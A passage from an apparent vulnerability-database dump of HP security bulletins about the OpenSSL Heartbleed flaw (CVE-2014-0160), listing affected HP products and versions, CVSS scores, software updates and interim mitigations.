Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhWIkACgkQ4B86/C0qfVlS4gCg3dawaqV9bzwlWOK6Rvo7GBoe\r\n3DIAnjRKVuvFS/HhR5BfuJqFtZdIT5Hc\r\n=lLVw\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03024 rev.1 - HP Insight Control Server Deployment on Linux and Windows running OpenSSL with System Management Homepage and Systems Insight Manager, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30494", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30494", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04261644\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04261644\r\nVersion: 2\r\n\r\nHPSBST03015 rev.2 - HP 3PAR OS running OpenSSL, Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-23\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP 3PAR OS\r\nrunning OpenSSL. 
This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101526\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP 3PAR OS 3.1.2 and subsequent\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nsoftware versions of 3PAR OS. This bulletin will be revised when the software\r\nupdates are released.\r\n\r\nUntil the software update is available, HP recommends limiting 3PAR OS\r\nManagement Tools to use only on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\nVersion:2 (rev.2) - 23 April 2014 Added recommendation for use of 3PAR OS\r\nManagement Tools\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNYMYwACgkQ4B86/C0qfVmSXwCcDoqspliALHdporVpYpZ7t6jF\r\nOnQAn0ec0FZvxPMxM0Uk/iQ7K2kmO1DT\r\n=ORml\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBST03015 rev.2 - HP 3PAR OS running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30504", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30504", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236062\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236062\r\nVersion: 3\r\n\r\nHPSBMU02994 rev.3 - HP BladeSystem c-Class Onboard Administrator (OA) running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP BladeSystem\r\nc-Class Onboard Administrator (OA) running OpenSSL. 
This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101500\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP BladeSystem c-Class Onboard Administrator (OA) v4.11 and v4.20\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made Onboard Administrator (OA) v4.12 and v4.21 available to resolve\r\nthe vulnerability here:\r\n\r\nGo to:\r\nhttp://www.hp.com/go/oa\r\n\r\nClick "Onboard Administrator Firmware"\r\nSelect "HP BLc3000 Onboard Administrator Option" or "HP BLc7000 Onboard\r\nAdministrator Option"\r\nSelect an appropriate operating system from the list of choices\r\nOn the page, find Firmware 4.12 or v4.21 for download\r\n\r\nNotes\r\n\r\nNo action is required unless the OA is running the firmware versions\r\nexplicitly listed as vulnerable.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\nVersion:2 (rev.2) - 18 April 2014 Added software update information for v4.12\r\nVersion:3 (rev.3) - 25 April 2014 Added software update information for v4.21\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNaq/0ACgkQ4B86/C0qfVmBoACgmzkyr8qMTcs0ADEi4tGXug2j\r\nk4gAoPlR4SOE2FAQjkIMjCpmnAJBKfqj\r\n=LRhJ\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU02994 rev.3 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30499", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30499", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260353\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260353\r\nVersion: 1\r\n\r\nHPSBMU03019 rev.1 - HP Software UCMDB Browser and Configuration Manager\r\nrunning OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software UCMDB\r\nBrowser and Configuration Manager running OpenSSL. The Heartbleed\r\nvulnerability was detected in specific OpenSSL versions. 
OpenSSL is a 3rd\r\nparty product that is embedded in some HP Software products. The objective\r\nof this bulletin is to notify HP Software customers about products affected\r\nby the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products that appear in the\r\nlist below are vulnerable because they embed OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101530)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nUCMDB Browser (with Tomcat embedded install bits) v.1x, v.2.x, v3.x\r\nConfiguration manager v.9.1x, v.9.2x, 9.3x, 10.01, 10.10 (including all\r\npatches)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00863916\r\n\r\nHP recommends following UCMDB Browser and Configuration Manager guidelines\r\nincluding the following action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. 
operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording to instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit\r\nhttp://www8.hp.com/us/en/software-solutions/enterprise-software-security-center/response-center.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 April 2014 Initial release\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNWawYACgkQ4B86/C0qfVmF5wCgmid+aSKir9WSm/VbldCfI1fz\r\njsUAoMPwYqI3xNomVEElTXzeceNKT7FJ\r\n=or+Z\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03019 rev.1 - HP Software UCMDB Browser and Configuration Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30509", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30509", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239372\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239372\r\nVersion: 
1\r\n\r\nHPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on\r\nLinux and Windows, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP System\r\nManagement Homepage (SMH) running on Linux and Windows. This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101501\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP System Management Homepage (SMH). 
This bulletin will be\r\nrevised when the software updates are released.\r\n\r\nInformation and downloads for HP SMH can be found at the following location:\r\n\r\nhttp://h18013.www1.hp.com/products/servers/management/agents/index.html\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVnUpACgs06y+OxukBiWTHsJUzFVtUs8\r\naeYAn2YETGkjLUrH6Js44b/Lgl4J2nry\r\n=3CzH\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-20T00:00:00", "title": "[security bulletin] HPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30477", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30477", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04240206\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04240206\r\nVersion: 1\r\n\r\nHPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should 
be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-15\r\nLast Updated: 2014-04-15\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP XP P9500 Disk\r\nArray running OpenSSL. This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101506\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP XP P9500 Disk Array OSS 70-06-00/00 and 70-06-01/00 when running Apache\r\n2.2.24\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP XP P9500 Disk Array. 
This bulletin will be revised when the\r\nsoftware updates are released.\r\n\r\nThe two versions of Apache available in OSS 70-06-00/00 and 70-06-01/00 are:\r\n\r\nApache 2.2.10 (with OpenSSL 0.9.8o) which is not impacted by CVE-2014-0160\r\nApache 2.2.24 (with OpenSSL 1.0.1e) which is impacted by CVE-2014-0160\r\n\r\nUntil a new version is available, keep the SVP(s) on an array on the earlier\r\nversion of Apache available from the OSS image (version 2.2.10)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 15 April 2014 Initial release\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNNOSEACgkQ4B86/C0qfVl7IwCcCAFossT9cI/G1w8Zjt125fWa\r\nwwQAnR+wDpUBjcU/REah/pNV80/+VNeR\r\n=Do3J\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-20T00:00:00", "title": "[security bulletin] HPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30478", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30478", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04262472\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04262472\r\nVersion: 1\r\n\r\nHPSBMU03020 rev.1 - HP Version 
Control Agent (VCA) and Version Control\r\nRepository Manager (VCRM) running OpenSSL on Linux and Windows, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-24\r\nLast Updated: 2014-04-24\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Version\r\nControl Agent (VCA) and Version Control Repository Manager (VCRM) running\r\nOpenSSL on Linux and Windows. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101531\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nsoftware versions of HP Version Control Agent (VCA) and Version Control\r\nRepository Manager (VCRM). 
This bulletin will be revised when the software\r\nupdates are released.\r\n\r\nUntil the software updates are available, HP recommends the following\r\nmitigations and workarounds:\r\n\r\nDisable the VCA service name "HP Version Control Agent" on any vulnerable\r\nWindows or Linux server. Disable the VCRM service name "HP Version Control\r\nRepository Manager" on any vulnerable server. Typically, the VCRM is\r\ninstalled on a HP Systems Insight Manager server, but may be installed on\r\nanother server.\r\nIf bulk software or firmware updates are required, use an unaffected or\r\npatched version of HP Smart Update Manager (HP SUM) to do single or batch\r\nupdates.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 April 2014 Initial release\r\n\r\n
-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNZRKMACgkQ4B86/C0qfVnRjACcDCv9Sl93QAssH48SvbycVxCr\r\nfdUAn20/zGmeeTJR2L3N6qzFVQ0PXNAh\r\n=JCF2\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03020 rev.1 - HP Version Control Agent (VCA) and Version Control Repository Manager (VCRM) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30502", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30502", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04264271\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04264271\r\nVersion: 1\r\n\r\nHPSBMU03023 rev.1 - HP BladeSystem c-Class Virtual Connect Support Utility\r\n(VCSU) running OpenSSL on Linux and Windows, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-25\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP BladeSystem\r\nc-Class Virtual Connect Support Utility (VCSU) running OpenSSL on Linux and\r\nWindows. 
This is the OpenSSL vulnerability known as "Heartbleed" which could\r\nbe exploited remotely resulting in disclosure of information. The Virtual\r\nConnect firmware itself is not vulnerable to CVE-2014-0160 (Heartbleed),\r\nhowever, the installer component in versions 4.10 and 4.20 of Virtual Connect\r\ndoes have the vulnerability, and should be replaced with versions 4.10b or\r\n4.20b, or the latest version of Virtual Connect Support Utility referenced\r\nbelow. The VCSU vulnerability is only present during the firmware upgrade\r\nprocess.\r\n\r\nReferences: CVE-2014-0160, SSRT101535\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP BladeSystem c-Class Virtual Connect Support Utility (VCSU) 1.9.0 for Linux\r\nand Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for HP BladeSystem\r\nc-Class Virtual Connect Support Utility (VCSU) for Linux and Windows:\r\n\r\nHP VCSU 1.9.1 for Linux:\r\n\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\r\ns/?sp4ts.oid=3201247&spf_p.tpst=swdMain&spf_p.prp_swdMain=wsrp-navigationalSt\r\nate%3Didx%253D%257CswItem%253DMTX_315720dcc692488599123352b4%257CswEnvOID%253\r\nD4048%257CitemLocale%253D%257CswLang%253D%257Cmode%253D%257Caction%253Ddriver\r\nDocument&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endC\r\nacheTok=com.vignette.cachetoken\r\n\r\nHP VCSU 1.9.1 for 
Windows:\r\n\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\r\ns/?sp4ts.oid=3201247&spf_p.tpst=swdMain&spf_p.prp_swdMain=wsrp-navigationalSt\r\nate%3Didx%253D%257CswItem%253DMTX_3b24f68469fb4090a82ea0f398%257CswEnvOID%253\r\nD4138%257CitemLocale%253D%257CswLang%253D%257Cmode%253D%257Caction%253Ddriver\r\nDocument&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endC\r\nacheTok=com.vignette.cachetoken\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 April 2014 Initial release\r\n\r\n
-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNacsoACgkQ4B86/C0qfVlf/QCfdUuMhxr90Phgq1qg7mXztmPm\r\nHMsAoOo2nt8TGxHfihmmM08k7j/3RkR0\r\n=yiR8\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03023 rev.1 - HP BladeSystem c-Class Virtual Connect Support Utility (VCSU) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30501", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30501", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04272892\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: 
c04272892\r\nVersion: 1\r\n\r\nHPSBMU03033 rev.1 - HP Insight Control Software Components running OpenSSL,\r\nRemote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Insight\r\nControl software components running OpenSSL. This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101550\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Control impacted software component products and versions\r\n\r\nHP Systems Insight Manager v7.2, v7.2.1, v7.2.2, v7.3, and v7.3.1 bundled\r\nwith the following software:\r\n\r\nHP Smart Update Manager (SUM) v6.0.0 through v6.3.0\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\nWMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, 
and v7.2.2\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Insight Control\r\nsoftware components in the following HP Security Bulletins.\r\n\r\nHP Insight Control software components\r\n HP Security Bulletin\r\n Security Bulletin Location\r\n\r\nHP Systems Insight Manager (SIM)\r\n HPSBMU03022\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04263236\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHP System Management Homepage (SMH)\r\n HPSBMU02998\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239372\r\n\r\nWMI Mapper for HP Systems Insight Manager\r\n HPSBMU03013\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04260385\r\n\r\nHP Version Control Agent (VCA) and Version Control Repository Manager (VCRM)\r\non Linux and Windows,\r\n HPSBMU03020\r\n 